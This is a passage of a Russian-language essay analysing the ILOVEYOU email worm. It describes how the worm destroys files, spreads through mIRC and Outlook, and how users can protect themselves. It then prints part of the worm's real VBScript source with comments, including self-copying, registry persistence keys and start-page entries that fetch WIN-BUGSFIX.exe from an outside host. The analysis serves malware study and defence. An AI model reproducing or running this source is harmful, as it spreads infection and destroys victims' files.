Смекни!
smekni.com
Информатика и программирование

Интернет – червь I LOVE YOU (LOVE LETTER FOR YOU). Принцип работы. Меры безопасности для защиты от заражения и предотвращения деструктивных действий (стр. 2 из 3)

- если расширения .VBS или .VBE – вирус записывает вместо них свое тело, не меняя расширения;

- если расширения .JS; .JSE; .CSS; .WSH; .SCT; .HTA – вирус записывает вместо них свое тело и меняет расширения на .VBS. Оригинальные файлы удаляются.

- если расширения .JPG или .JPE – вирус записывает вместо них свое тело и меняет расширения на .VBS. Оригинальные файлы удаляются.

- если расширения файлов .MP2; .MP3 – вирус создает файлы с такими же именами, но расширениями .VBS, а оригинальным файлам присваивает атрибут «Hidden».

Алгоритм деструктивных действий очень прост и прозрачен. Автором для начинающих вирмейкеров оставлена возможность безудержно фантазировать и произвольно изменять (а также расширять по своему усмотрению) список расширений файлов, подвергающихся атаке. Поэтому после атаки оригинального вируса в течении трех дней мировая сеть была наводнена его клонами. И клоны эти были уже направлены на файлы с расширениями .COM; .EXE; .DLL;.INI и т.д.

Закончив свои деструктивные действия на компьютере пользователя, вирус предпринимает действия для дальнейшего распространения среди пользователей сети Internet.

В первую очередь он ищет в системе программу mIRC32, осуществляющую связь с чат-серверами и при ее наличии создает файл script.ini [12]. В теле скрипта пишется грозное предупреждение о том, что запрещается редактировать этот скрипт – это приведет к повреждению программы mIRC, а при поврежденной mIRC система не будет работать корректно. Таким образом автор пытается предотвратить попытки пользователя очистить скрипт от лишнего содержимого. В скрипт включается запись, которая осуществляет рассылку всем участникам чата копии вируса в виде файла LOVE-LETTER-FOR-YOU.HTM [13]. Сам файл содержится в теле вируса.

После попытки (удачной или неудачной) распространения своего тела среди участников чата, вирус предпринимает попытку распространения себя по электронной почте, используя при этом программу Microsoft Outlook Express [14].

Вначале вирус получает доступ к адресной книге приложения Outlook [15], а затем организует цикл перебора адресов для создания писем со своим телом [16].

Далее вирус создает тело письма с адресом отправителя, темой и текстом [17], присоединяет к письму файл с телом вируса [18] и отправляет его адресату. Если в Outlook нет адресной книги или она пустая – письма не создаются.

Закончив свои процедуры вирус завершает работу не оставляя при этом своей резидентной копии в памяти компьютера.

ОСОБЕННОСТИ АЛГОРИТМА ВИРУСА, ВЫВОДЫ И НЕКОТОРЫЕ РЕКОМЕНДАЦИИ ПО БОРЬБЕ С ПОДОБНЫМИ ТИПАМИ ВИРУСОВ.

Подробный анализ алгоритма вируса позволяет сделать несколько выводов.

Исследуемый вирус, его клоны и другие вирусы данного типа не являются чем-либо из ряда вон выходящим. В нем используются достаточно простой алгоритм и механизм проникновения в систему. Хотелось бы отметить и то, что процесс проникновения в систему не использует каких либо функций, позволяющих скрыть свое присутствие в системе. В чем же состоит опасность вируса? Исследуя его, я не увидел каких-либо ярко выраженных особенностей алгоритма и приемов стелсирования, однако ущерб от его деструктивных действий огромен. Это кажется парадоксом.

Внимательно исследуя алгоритм вируса и процесс его работы я пришел к выводу, что автор вируса умело использовал знания человеческой психологии, при этом предназначив вирус для той категории пользователей, которая сейчас очень многочисленна – пользователей домашних персональных компьютеров, подключенных к сети Internet. Так же на этом вирусе «попались» недостаточно профессионально подготовленные системные администраторы узлов.

Как же возможно противостоять атаке исследуемого вируса и подобных ему? Алгоритм заражения и деструктивных действий может видоизменяться, но каналов проникновения в систему не так уж и много. В связи с этим вирусописатели вынуждены использовать всевозможные приманки для пользователей. Мы уже видим, что в исследуемом вирусе использовано признание в любви в качестве приманки. Очень многие не смогли побороть искушения посмотреть, кто же так любит его. Так же возможны к использованию в качестве темы письма и такие варианты: «…Вы хотите заработать за день 10000 долларов?» или «…бесплатные звонки в СЩА» или «… мобильные телефоны за 1$ без абонентской платы».

Что бы я посоветовал пользователям, заинтересованным в защите от распространяющихся в последнее время как грибы после дождя интернет-червей?

1. Никогда не читайте полученные по электронной почте письма с предложениями чего-либо бесплатного или очень дешевого, а так же любые другие заманчивые предложения. В лучшем случае это может оказаться «спамом». Обратитесь к системному администратору Вашего узла с просьбой проверить письмо на наличие нового вируса.

2. Никогда не оставляйте настроек Windows и его приложений в режиме «по умолчанию». Данный режим предназначен неизвестно для кого и очень молоинформативен. Если Вы используете какое-либо приложение Windows, то внимательно изучите инструкции по его использованию и описание программ, тогда Вам будет легче ориентироваться – нормально ли работает приложение.

3. Используйте всегда свежее антивирусное программное обеспечение. Я посоветовал бы пользоваться антивирусом AVP лаборатории Евгения Касперского. У меня на компьютере установлена версия 1.32 и на сайте лаборатори и я ежедневно получаю дополнения по Internet.


Исходный текст вируса LOVE-LETTER-FOR-YOU ( I LOVE YOU) с комментариями.

rem barok -loveletter(vbe) <i hate go to school> Копирайты автора вируса, на основании

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines которых сделан вывод о филиппинском про-

On Error Resume Next исхождении вируса [1]

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=""

ctr=0

Set fso = CreateObject("Scripting.FileSystemObject") Подготавливается окружение для работы вируса. [2]

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll Читается основной файл вируса [3]

main() Запускается главная процедура

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject("WScript.Shell") Если установлен запрет на

rr=wscr.RegRead("HKEY_CURRENT_USER&bsol;Software&bsol;Microsoft&bsol;Windows Scripting Host&bsol;Settings&bsol;Timeout") обработку скриптов, то

if (rr>=1) then изменением ключа в [4]

wscr.RegWrite "HKEY_CURRENT_USER&bsol;Software&bsol;Microsoft&bsol;Windows Scripting Host&bsol;Settings&bsol;Timeout",0,"REG_DWORD" реестре она разрешается.

end if

Set dirwin = fso.GetSpecialFolder(0) Определяются пути к: каталогу WIN; [5]

Set dirsystem = fso.GetSpecialFolder(1) каталогу SYSTEM;

Set dirtemp = fso.GetSpecialFolder(2) каталогу TEMP;

Set c = fso.GetFile(WScript.ScriptFullName) ; Определяется имя активного файла

c.Copy(dirsystem&"&bsol;MSKernel32.vbs") ; В каталог SYSTEM копируется копия вируса [6]

c.Copy(dirwin&"&bsol;Win32DLL.vbs") ; В каталог WIN копируется копия вируса

c.Copy(dirsystem&"&bsol;LOVE-LETTER-FOR-YOU.TXT.vbs") ; В каталог SYSTEM копируется вторая копия вируса

regruns() ; Запускается процедура работы с реестром Windows

html() ; Запускается процедура работы с HTML файлами

spreadtoemail() ; Запускается процедура работы с электронной почтой

listadriv() ; Запускается процедура деструктивных действий

end sub

====================Процедура работы с реестром WINDOWS================

sub regruns()

On Error Resume Next

Dim num,downread

regcreate "HKEY_LOCAL_MACHINE&bsol;Software&bsol;Microsoft&bsol;Windows&bsol;CurrentVersion&bsol;Run&bsol;MSKernel32",dirsystem&"&bsol;MSKernel32.vbs"

regcreate "HKEY_LOCAL_MACHINE&bsol;Software&bsol;Microsoft&bsol;Windows&bsol;CurrentVersion&bsol;RunServices&bsol;Win32DLL",dirwin&"&bsol;Win32DLL.vbs"


Создается ключ в реестре, который будет запускать вирус при загрузке WINDOWS

downread=""

downread=regget("HKEY_CURRENT_USER&bsol;Software&bsol;Microsoft&bsol;Internet Explorer&bsol;Download Directory") Анализируется расположение каталога

if (downread="") then Download Directory и если он не является

downread="c:&bsol;" корневым каталогом диска С: , то пере-

end if назначается на C:&bsol; [7]

if (fileexist(dirsystem&"&bsol;WinFAT32.exe")=1) then Проверяется наличие в системном каталоге файла WinFAT32.exe [8]

Randomize и при его наличии генерируется случайное число в пределах 1 - 4

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate "HKCU&bsol;Software&bsol;Microsoft&bsol;Internet Explorer&bsol;Main&bsol;Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif num = 2 then

regcreate "HKCU&bsol;Software&bsol;Microsoft&bsol;Internet Explorer&bsol;Main&bsol;Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif num = 3 then

regcreate "HKCU&bsol;Software&bsol;Microsoft&bsol;Internet Explorer&bsol;Main&bsol;Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif num = 4 then

regcreate "HKCU&bsol;Software&bsol;Microsoft&bsol;Internet Explorer&bsol;Main&bsol;Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"

end if

end if

В случае наличия в системной директории файла WinFAT32.exe производится прописывание одного из четырех адресов сайта http://www.skyinet.net/ в реестре в качестве стартовой страницы для Microsoft Internet Explorer (в зависимости от сгенерированного случайного числа ). С сервера скачивается файл WIN-BUGSFIX.exe. [9]

if (fileexist(downread&"&bsol;WIN-BUGSFIX.exe")=0) then
 
назад
читать дальше
1
2
3
НАПИШИТЕ НАМ
Copyright © Smekni.com. All rigths reserved.